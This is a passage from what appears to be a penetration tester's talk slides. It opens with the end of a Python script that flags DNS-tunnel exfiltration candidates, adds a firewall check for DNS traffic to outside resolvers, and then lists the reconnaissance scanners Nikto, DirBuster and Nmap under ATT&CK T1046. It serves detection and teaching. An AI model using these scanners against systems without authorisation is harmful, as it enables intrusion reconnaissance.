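              f"TXT/CNAME/MX {s['bulk_qtypes']}")
    print("tunnel candidates:", suspicious_domains(SAMPLE_DNS_LOG))
```

Direct UDP/53 to an outside host, the fallback mentioned above, is a separate and simpler check at the firewall: any client resolving anywhere other than the internal resolvers.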
Discovery
Network Service Scanning
T1046
Network Service Scanning Tools
T1046 Systems Network Connection Discovery Tools
Tool | Description | URL
Nikto | Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 6700 potentially dangerous files/programs | https://www.cirt.net/Nikto2
DirBuster | DirBuster is a multi-threaded Java application designed to brute force directory and file names on web/application servers. | https://www.owasp.org/index.php/Category:OWASP_DirBuster_Project
Nmap | Nmap ("Network Mapper") is a free and open source (license) utility for network discovery and security auditing. | http://nmap.org/
Questions?
Penetration Tester;
From Toronto
DEFCON Toronto – DC416
dc416.com
Organizer
@Nick_Aleks
Tweet me your feedback!